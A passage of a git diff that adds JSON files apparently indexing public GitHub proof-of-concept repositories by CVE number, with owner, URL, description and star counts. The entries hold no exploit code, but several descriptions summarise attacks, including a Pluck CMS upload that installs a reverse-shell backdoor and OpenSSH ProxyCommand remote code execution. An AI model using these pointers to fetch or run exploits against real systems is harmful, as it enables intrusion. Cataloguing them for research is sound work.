"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843762610, + "name": "CVE-2023-50564", + "full_name": "rwexecute\/CVE-2023-50564", + "owner": { + "login": "rwexecute", + "id": 50677809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50677809?v=4", + "html_url": "https:\/\/github.com\/rwexecute", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwexecute\/CVE-2023-50564", + "description": "Python Script to exploit CVE-2023-50564", + "fork": false, + "created_at": "2024-08-17T10:46:02Z", + "updated_at": "2024-10-14T12:43:15Z", + "pushed_at": "2024-10-14T12:43:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847072591, + "name": "CVE-2023-50564-pluck", + "full_name": "thefizzyfish\/CVE-2023-50564-pluck", + "owner": { + "login": "thefizzyfish", + "id": 94797978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94797978?v=4", + "html_url": "https:\/\/github.com\/thefizzyfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thefizzyfish\/CVE-2023-50564-pluck", + "description": "CVE-2023-50564 - An arbitrary file upload vulnerability in the component \/inc\/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.", + "fork": false, + "created_at": "2024-08-24T19:09:21Z", + "updated_at": "2024-10-03T19:30:39Z", + "pushed_at": "2024-10-03T19:30:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873106151, + "name": "CVE-2023-50564", + "full_name": "Mrterrestrial\/CVE-2023-50564", + "owner": { + "login": "Mrterrestrial", + "id": 118843990, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118843990?v=4", + "html_url": "https:\/\/github.com\/Mrterrestrial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mrterrestrial\/CVE-2023-50564", + "description": "This script exploits the file upload feature in Pluck CMS v4.7.18 to upload a malicious PHP file, enabling remote access via a reverse shell. Once uploaded, this backdoor grants the attacker server access with web server permissions, allowing further actions within the system or network.", + "fork": false, + "created_at": "2024-10-15T15:58:06Z", + "updated_at": "2024-11-07T20:30:03Z", + "pushed_at": "2024-10-15T17:20:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879407389, + "name": "Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564", + "full_name": "0xDTC\/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564", + "description": "Refurbish exploit in bash", + "fork": false, + "created_at": "2024-10-27T20:21:31Z", + "updated_at": "2024-10-28T15:10:27Z", + "pushed_at": "2024-10-27T20:22:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50596.json b/2023/CVE-2023-50596.json new file mode 100644 index 0000000000..b67d078e50 --- /dev/null +++ b/2023/CVE-2023-50596.json @@ -0,0 +1,33 @@ +[ + { + "id": 734100171, + "name": "CVE-2023-50596", + "full_name": "chandraprarikraj\/CVE-2023-50596", + "owner": { + "login": "chandraprarikraj", + "id": 154472358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154472358?v=4", + "html_url": "https:\/\/github.com\/chandraprarikraj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chandraprarikraj\/CVE-2023-50596", + "description": null, + "fork": false, + "created_at": "2023-12-20T21:43:28Z", + "updated_at": "2023-12-20T21:43:28Z", + "pushed_at": "2023-12-20T21:44:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50643.json b/2023/CVE-2023-50643.json new file mode 100644 index 0000000000..9ac701f5ff --- /dev/null +++ b/2023/CVE-2023-50643.json @@ -0,0 +1,33 @@ +[ + { + "id": 729209972, + "name": "CVE-2023-50643", + "full_name": "giovannipajeu1\/CVE-2023-50643", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2023-50643", + "description": "CVE-2023-50643", + "fork": false, + "created_at": "2023-12-08T16:37:16Z", + "updated_at": "2024-06-11T18:01:05Z", + "pushed_at": "2023-12-15T21:06:14Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50685.json b/2023/CVE-2023-50685.json new file mode 100644 index 0000000000..27cc351e63 --- /dev/null +++ b/2023/CVE-2023-50685.json @@ -0,0 +1,43 @@ +[ + { + "id": 729822594, + "name": "Hipcam-RTSP-Format-Validation-Vulnerability", + "full_name": "MaximilianJungblut\/Hipcam-RTSP-Format-Validation-Vulnerability", + "owner": { + "login": "MaximilianJungblut", + "id": 62648617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62648617?v=4", + "html_url": "https:\/\/github.com\/MaximilianJungblut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaximilianJungblut\/Hipcam-RTSP-Format-Validation-Vulnerability", + "description": "This POC exploits a format validation vulnerability in the RTSP service of the Hipcam RealServer\/V1.0, inducing a crash for approximately 45 seconds by injecting random data into the 'client_port' parameter during the RTSP SETUP request. Hipcam RealServer\/V1.0 is used in many Hipcam Cameras. | CVE-2023-50685", + "fork": false, + "created_at": "2023-12-10T13:21:43Z", + "updated_at": "2024-05-02T14:40:08Z", + "pushed_at": "2024-05-02T14:40:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "camera", + "crash", + "exploit", + "format-validation", + "hipcam", + "poc", + "proof-of-concept", + "rtsp", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5070.json b/2023/CVE-2023-5070.json new file mode 100644 index 0000000000..9ec112ba68 --- /dev/null +++ b/2023/CVE-2023-5070.json @@ -0,0 +1,33 @@ +[ + { + "id": 706058561, + "name": "CVE-2023-5070", + "full_name": "RandomRobbieBF\/CVE-2023-5070", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5070", + "description": "Social Media Share Buttons & Social Sharing Icons <= 2.8.5 - Information Exposure", + "fork": false, + "created_at": "2023-10-17T08:19:09Z", + "updated_at": "2024-08-12T20:32:53Z", + "pushed_at": "2023-10-17T08:23:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50868.json b/2023/CVE-2023-50868.json new file mode 100644 index 0000000000..244696cb2b --- /dev/null +++ b/2023/CVE-2023-50868.json @@ -0,0 +1,33 @@ +[ + { + "id": 774480851, + "name": "NSEC3-Encloser-Attack", + "full_name": "Goethe-Universitat-Cybersecurity\/NSEC3-Encloser-Attack", + "owner": { + "login": "Goethe-Universitat-Cybersecurity", + "id": 163991309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163991309?v=4", + "html_url": "https:\/\/github.com\/Goethe-Universitat-Cybersecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Goethe-Universitat-Cybersecurity\/NSEC3-Encloser-Attack", + "description": "This project generates DNS zonefiles with custom NSEC3 parameters to reproduce and evaluate the attacks in CVE-2023-50868.", + "fork": false, + "created_at": "2024-03-19T16:13:14Z", + "updated_at": "2024-10-24T19:54:07Z", + "pushed_at": "2024-05-27T12:07:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5089.json b/2023/CVE-2023-5089.json new file mode 100644 index 0000000000..14cf4c6992 --- /dev/null +++ b/2023/CVE-2023-5089.json @@ -0,0 +1,40 @@ +[ + { + "id": 805244897, + "name": "CVE-2023-5089", + "full_name": "Cappricio-Securities\/CVE-2023-5089", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-5089", + "description": "Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)", + "fork": false, + "created_at": "2024-05-24T07:14:55Z", + "updated_at": "2024-09-06T13:09:49Z", + "pushed_at": "2024-06-24T08:42:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-5089", + "pentesting", + "wapt", + "wordpress", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50917.json b/2023/CVE-2023-50917.json new file mode 100644 index 0000000000..647e3c5380 --- /dev/null +++ b/2023/CVE-2023-50917.json @@ -0,0 +1,33 @@ +[ + { + "id": 711386901, + "name": "CVE-2023-50917", + "full_name": "Chocapikk\/CVE-2023-50917", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-50917", + "description": "MajorDoMo Unauthenticated RCE: Deep Dive & Exploitation Techniques", + "fork": false, + "created_at": "2023-10-29T05:10:09Z", + "updated_at": "2024-08-12T20:32:57Z", + "pushed_at": "2023-12-18T01:15:30Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51000.json b/2023/CVE-2023-51000.json new file mode 100644 index 0000000000..d6ec979c8e --- /dev/null +++ b/2023/CVE-2023-51000.json @@ -0,0 +1,33 @@ +[ + { + "id": 756306550, + "name": "CVE-2023-51000", + "full_name": "Team-Byerus\/CVE-2023-51000", + "owner": { + "login": "Team-Byerus", + "id": 156511157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156511157?v=4", + "html_url": "https:\/\/github.com\/Team-Byerus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Team-Byerus\/CVE-2023-51000", + "description": null, + "fork": false, + "created_at": "2024-02-12T12:06:07Z", + "updated_at": "2024-02-12T12:06:08Z", + "pushed_at": "2024-02-12T12:06:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51073.json b/2023/CVE-2023-51073.json new file mode 100644 index 0000000000..7d0b69f59b --- /dev/null +++ b/2023/CVE-2023-51073.json @@ -0,0 +1,33 @@ +[ + { + "id": 739242348, + "name": "CVE-2023-51073", + "full_name": "christopher-pace\/CVE-2023-51073", + "owner": { + "login": "christopher-pace", + "id": 22531478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22531478?v=4", + "html_url": "https:\/\/github.com\/christopher-pace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/christopher-pace\/CVE-2023-51073", + "description": "Firmware Update Server Verification Vulnerability on Buffalo LS210D Version 1.78-0.03", + "fork": false, + "created_at": "2024-01-05T05:16:18Z", + "updated_at": "2024-01-07T02:12:37Z", + "pushed_at": "2024-01-07T01:40:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51119.json b/2023/CVE-2023-51119.json new file mode 100644 index 0000000000..dda6db4606 --- /dev/null +++ b/2023/CVE-2023-51119.json @@ -0,0 +1,33 @@ +[ + { + "id": 789571635, + "name": "CVE-2023-51119", + "full_name": "OscarAkaElvis\/CVE-2023-51119", + "owner": { + "login": "OscarAkaElvis", + "id": 5803348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5803348?v=4", + "html_url": "https:\/\/github.com\/OscarAkaElvis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OscarAkaElvis\/CVE-2023-51119", + "description": "Improper Access Control on D-Link DIR-605L router", + "fork": false, + "created_at": "2024-04-20T23:37:10Z", + "updated_at": "2024-07-07T13:54:45Z", + "pushed_at": "2024-04-20T23:41:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51126.json b/2023/CVE-2023-51126.json new file mode 100644 index 0000000000..76eac48c45 --- /dev/null +++ b/2023/CVE-2023-51126.json @@ -0,0 +1,33 @@ +[ + { + "id": 737937769, + "name": "CVE-2023-51126", + "full_name": "risuxx\/CVE-2023-51126", + "owner": { + "login": "risuxx", + "id": 47944560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47944560?v=4", + "html_url": "https:\/\/github.com\/risuxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/risuxx\/CVE-2023-51126", + "description": null, + "fork": false, + "created_at": "2024-01-02T02:31:06Z", + "updated_at": "2024-01-03T14:30:50Z", + "pushed_at": "2024-01-02T02:38:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51127.json b/2023/CVE-2023-51127.json new file mode 100644 index 0000000000..d9a17ee262 --- /dev/null +++ b/2023/CVE-2023-51127.json @@ -0,0 +1,33 @@ +[ + { + "id": 737940013, + "name": "CVE-2023-51127", + "full_name": "risuxx\/CVE-2023-51127", + "owner": { + "login": "risuxx", + "id": 47944560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47944560?v=4", + "html_url": "https:\/\/github.com\/risuxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/risuxx\/CVE-2023-51127", + "description": null, + "fork": false, + "created_at": "2024-01-02T02:43:09Z", + "updated_at": "2024-01-03T14:30:37Z", + "pushed_at": "2024-01-02T02:46:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51214.json b/2023/CVE-2023-51214.json new file mode 100644 index 0000000000..abf450cb9e --- /dev/null +++ b/2023/CVE-2023-51214.json @@ -0,0 +1,33 @@ +[ + { + "id": 734095645, + "name": "CVE-2023-51214", + "full_name": "chandraprarikraj\/CVE-2023-51214", + "owner": { + "login": "chandraprarikraj", + "id": 154472358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154472358?v=4", + "html_url": "https:\/\/github.com\/chandraprarikraj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chandraprarikraj\/CVE-2023-51214", + "description": null, + "fork": false, + "created_at": "2023-12-20T21:23:33Z", + "updated_at": "2023-12-20T21:23:34Z", + "pushed_at": "2023-12-20T21:35:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51281.json b/2023/CVE-2023-51281.json new file mode 100644 index 0000000000..c98d46492f --- /dev/null +++ b/2023/CVE-2023-51281.json @@ -0,0 +1,33 @@ +[ + { + "id": 734782806, + "name": "CVE-2023-51281", + "full_name": "geraldoalcantara\/CVE-2023-51281", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51281", + "description": "Multiple cross-site scripting (XSS) vulnerabilities in \/customer_support\/ajax.php?action=save_customer in Customer Support System 1.0 allow authenticated attackers to execute to execute arbitrary web scripts or HTML via a crafted payload injected into the “firstname”, \"lastname\", \"middlename\", \"contact\" or “address” parameters.", + "fork": false, + "created_at": "2023-12-22T15:51:43Z", + "updated_at": "2023-12-22T16:08:00Z", + "pushed_at": "2023-12-22T16:07:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51385.json b/2023/CVE-2023-51385.json new file mode 100644 index 0000000000..ff648af3bd --- /dev/null +++ b/2023/CVE-2023-51385.json @@ -0,0 +1,622 @@ +[ + { + "id": 697796057, + "name": "poc-proxycommand-vulnerable", + "full_name": "vin01\/poc-proxycommand-vulnerable", + "owner": { + "login": "vin01", + "id": 30344579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30344579?v=4", + "html_url": "https:\/\/github.com\/vin01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vin01\/poc-proxycommand-vulnerable", + "description": "Proof of conept to exploit vulnerable proxycommand configurations on ssh clients (CVE-2023-51385)", + "fork": false, + "created_at": "2023-09-28T13:48:17Z", + "updated_at": "2024-10-24T10:18:18Z", + "pushed_at": "2023-10-12T19:06:26Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 47, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735476980, + "name": "CVE-2023-51385", + "full_name": "FeatherStark\/CVE-2023-51385", + "owner": { + "login": "FeatherStark", + "id": 42148584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4", + "html_url": "https:\/\/github.com\/FeatherStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2023-12-25T04:34:02Z", + "updated_at": "2023-12-25T04:34:02Z", + "pushed_at": "2023-12-25T04:35:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735514578, + "name": "poc-cve-2023-51385", + "full_name": "watarium\/poc-cve-2023-51385", + "owner": { + "login": "watarium", + "id": 30005626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30005626?v=4", + "html_url": "https:\/\/github.com\/watarium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watarium\/poc-cve-2023-51385", + "description": null, + "fork": false, + "created_at": "2023-12-25T07:43:29Z", + "updated_at": "2023-12-25T07:43:29Z", + "pushed_at": "2023-12-27T02:31:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735584620, + "name": "CVE-2023-51385", + "full_name": "Le1a\/CVE-2023-51385", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-51385", + "description": "OpenSSH ProxyCommand RCE", + "fork": false, + "created_at": "2023-12-25T12:51:05Z", + "updated_at": "2024-03-07T00:13:03Z", + "pushed_at": "2023-12-26T07:43:32Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735589944, + "name": "CVE-2023-51385_test", + "full_name": "LtmThink\/CVE-2023-51385_test", + "owner": { + "login": "LtmThink", + "id": 110249505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110249505?v=4", + "html_url": "https:\/\/github.com\/LtmThink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LtmThink\/CVE-2023-51385_test", + "description": "一个验证对CVE-2023-51385", + "fork": false, + "created_at": "2023-12-25T13:13:25Z", + "updated_at": "2024-04-15T01:18:31Z", + "pushed_at": "2024-03-17T08:25:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735851357, + "name": "CVE-2023-51385_poc-test", + "full_name": "WLaoDuo\/CVE-2023-51385_poc-test", + "owner": { + "login": "WLaoDuo", + "id": 69497874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69497874?v=4", + "html_url": "https:\/\/github.com\/WLaoDuo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WLaoDuo\/CVE-2023-51385_poc-test", + "description": "CVE-2023-51385;OpenSSH ProxyCommand RCE;OpenSSH <9.6 命令注入漏洞poc ", + "fork": false, + "created_at": "2023-12-26T09:01:02Z", + "updated_at": "2023-12-26T10:13:34Z", + "pushed_at": "2023-12-27T06:33:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737146570, + "name": "CVE-2023-51385_test", + "full_name": "power1314520\/CVE-2023-51385_test", + "owner": { + "login": "power1314520", + "id": 37863351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37863351?v=4", + "html_url": "https:\/\/github.com\/power1314520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/power1314520\/CVE-2023-51385_test", + "description": "一个验证对CVE-2023-51385", + "fork": false, + "created_at": "2023-12-30T01:08:29Z", + "updated_at": "2023-12-30T01:08:29Z", + "pushed_at": "2023-12-30T01:13:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737934166, + "name": "CVE-2023-51385", + "full_name": "WOOOOONG\/CVE-2023-51385", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2023-51385", + "description": "CVE-2023-51385 PoC Exploit ", + "fork": false, + "created_at": "2024-01-02T02:12:35Z", + "updated_at": "2024-07-03T04:28:13Z", + "pushed_at": "2024-01-02T06:48:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738402073, + "name": "CVE-2023-51385", + "full_name": "uccu99\/CVE-2023-51385", + "owner": { + "login": "uccu99", + "id": 155516921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155516921?v=4", + "html_url": "https:\/\/github.com\/uccu99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uccu99\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-03T06:28:34Z", + "updated_at": "2024-01-03T06:28:35Z", + "pushed_at": "2024-01-03T06:28:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738661198, + "name": "exploit-CVE-2023-51385", + "full_name": "julienbrs\/exploit-CVE-2023-51385", + "owner": { + "login": "julienbrs", + "id": 106234742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106234742?v=4", + "html_url": "https:\/\/github.com\/julienbrs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julienbrs\/exploit-CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-03T18:40:44Z", + "updated_at": "2024-01-03T18:40:44Z", + "pushed_at": "2024-01-03T18:41:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738669696, + "name": "malicious-exploit-CVE-2023-51385", + "full_name": "julienbrs\/malicious-exploit-CVE-2023-51385", + "owner": { + "login": "julienbrs", + "id": 106234742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106234742?v=4", + "html_url": "https:\/\/github.com\/julienbrs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julienbrs\/malicious-exploit-CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-03T19:08:28Z", + "updated_at": "2024-01-03T19:08:28Z", + "pushed_at": "2024-01-03T20:06:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741050517, + "name": "CVE-2023-51385", + "full_name": "Sonicrrrr\/CVE-2023-51385", + "owner": { + "login": "Sonicrrrr", + "id": 89630690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89630690?v=4", + "html_url": "https:\/\/github.com\/Sonicrrrr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sonicrrrr\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": 